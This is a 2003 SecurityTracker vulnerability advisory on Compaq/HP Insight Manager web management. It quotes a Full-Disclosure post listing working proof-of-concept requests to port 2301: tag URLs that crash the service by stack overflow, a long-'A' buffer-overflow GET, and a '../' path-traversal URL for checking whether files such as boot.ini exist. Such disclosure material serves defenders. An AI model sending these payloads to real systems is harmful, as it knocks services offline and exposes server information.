Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Generic)  >   HPE Systems Insight Manager Vendors:   HPE
Compaq Insight Manager Discloses File Existence to Remote Users and May Allow Denial of Service Attacks
SecurityTracker Alert ID:  1006453
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 3 2003
Impact:   Denial of service via network, Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  

Description:   Several vulnerabilities were reported in Compaq's Insight Manager. A remote user can determine if a specified file on the system exists or not. A remote user can also cause the service to crash.

It is reported that a remote user can request the following type of URL to determine whether a specified file exists on the server:


It is also reported that several URLs can trigger a stack overflow. The report did not indicate whether these overflows could result in arbitrary code execution. The URLs include:


A buffer overflow can also be triggered with the following HTTP request:

GET /<!.FunctionContentType=(About 250 AAAAA:s)> HTTP/1.0

A remote user can also view a 'TAG' list by requesting the following URL:


The report indicates that the above listed URLs can be used via the HTTPS port (tcp 2381), as well.

The vendor has reportedly been notified.

Impact:   A remote user can determine whether specified files exist on the server. A remote user can cause the web service to crash [Editor's note: It is not clear whether the service will automatically restart or if it requires a manual restart].
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Access control error, Boundary error, State error
Underlying OS:  Windows (NT), Windows (2000)

Message History:   None.

 Source Message Contents

Subject:  [Full-Disclosure] Compaq/HP WBEM stuff (fwd)

Compaq Insight Manager - Web-Based Management

Exploitable w3 server?
I don't know and i don't care...

Regards, bashis

> Subject: Compaq/HP WBEM stuff
> To:
> Date: Sun, 9 Mar 2003 22:56:04 +0100 (CET)
> Compaq Web-Based Management stuff.
> All versions of WBEM seems to be affected..
> (These 'tags' works also with 'secure' HTTPS tcp/2381.)
> http://<IP>:2301/<!.StringRedirecturl>
> Stack overflow (0xc00000fd), Address: 0x77f0c3dc
> http://<IP>:2301/<!>       
> Stack overflow (0xc00000fd), Address: 0x77f0c3dc
> http://<IP>:2301/survey/<!>
> Stack overflow (0xc00000fd), Address: 0x10039869
> http://<IP>:2301/<!.StringHttpRequest=Url>
> Stack overflow (0xc00000fd), Address: 0x77f0c3dc
> http://<IP>:2301/survey/<!.StringHttpRequest=Url>
> Stack overflow (0xc00000fd), Address: 0x10039869
> http://<IP>:2301/<!.StringIsapiECB=lpszPathInfo>
> Stack overflow (0xc00000fd), Address: 0x77f0c3dc
> http://<IP>:2301/<!.ObjectIsapiECB>
> Stack overflow (0xc00000fd), Address: 0x77f0c3dc
> GET /<!.FunctionContentType=(About 250 AAAAA:s)> HTTP/1.0
> Access violation (0xc0000005), Address: 0x100368a5
> Check file existens. (with a nice 'input box';)
> http://<IP>:2301/<!.DebugSearchPaths>?Url=%2F..%2F..%2F..%2F..%2Fboot.ini
> ..... plus many more tags.
> Get a whole 'TAG' list with:    
> http://<IP>:2301/<!.TableDisplayTags>
> Regards, bashis

Full-Disclosure - We believe in it.


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, LLC